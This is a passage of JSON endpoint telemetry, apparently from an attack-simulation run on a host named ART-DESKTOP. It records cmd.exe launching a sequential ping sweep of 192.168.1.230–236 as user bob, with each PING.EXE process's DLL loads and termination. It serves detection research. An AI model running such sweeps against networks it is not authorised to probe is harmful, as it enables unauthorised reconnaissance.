"{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573112140000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "event_type": "process", - "pid": 6052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573116830000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.230", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4244, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573116980000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "event_type": "process", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573121990000, - "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.231", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 560, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573122140000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "event_type": "process", - "pid": 560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573126830000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.232", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7088, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573126980000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "event_type": "process", - "pid": 7088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573131990000, - "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.233", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5788, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573132140000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "event_type": "process", - "pid": 5788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573136840000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.234", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 360, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573136980000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "event_type": "process", - "pid": 360, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573141990000, - "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.235", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3824, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573142200000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142140000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573142300000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "event_type": "process", - "pid": 3824, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.236", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6364, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573147029984, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573146980000, - "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6364, - "process_name": "PING.EXE", - "process_path": 